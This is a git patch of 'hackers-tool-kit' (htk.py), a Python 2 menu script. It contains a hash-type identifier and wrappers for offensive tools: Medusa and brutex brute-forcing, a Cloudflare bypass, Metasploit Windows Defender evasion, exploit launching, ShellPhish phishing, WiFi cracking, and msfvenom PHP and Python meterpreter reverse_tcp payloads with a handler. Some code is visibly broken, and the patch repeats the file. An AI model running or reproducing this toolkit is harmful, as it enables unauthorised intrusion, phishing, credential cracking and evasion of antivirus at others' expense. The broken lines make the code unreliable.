hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From bcfafc7f2ecfd95ef8109213e6f1109a19587cf5 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 25 May 2019 20:16:38 +0100 Subject: [PATCH 147/214] Add files via upload --- htk.py | 2920 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2920 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..8f42e38 --- /dev/null +++ b/htk.py @@ -0,0 +1,2920 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * 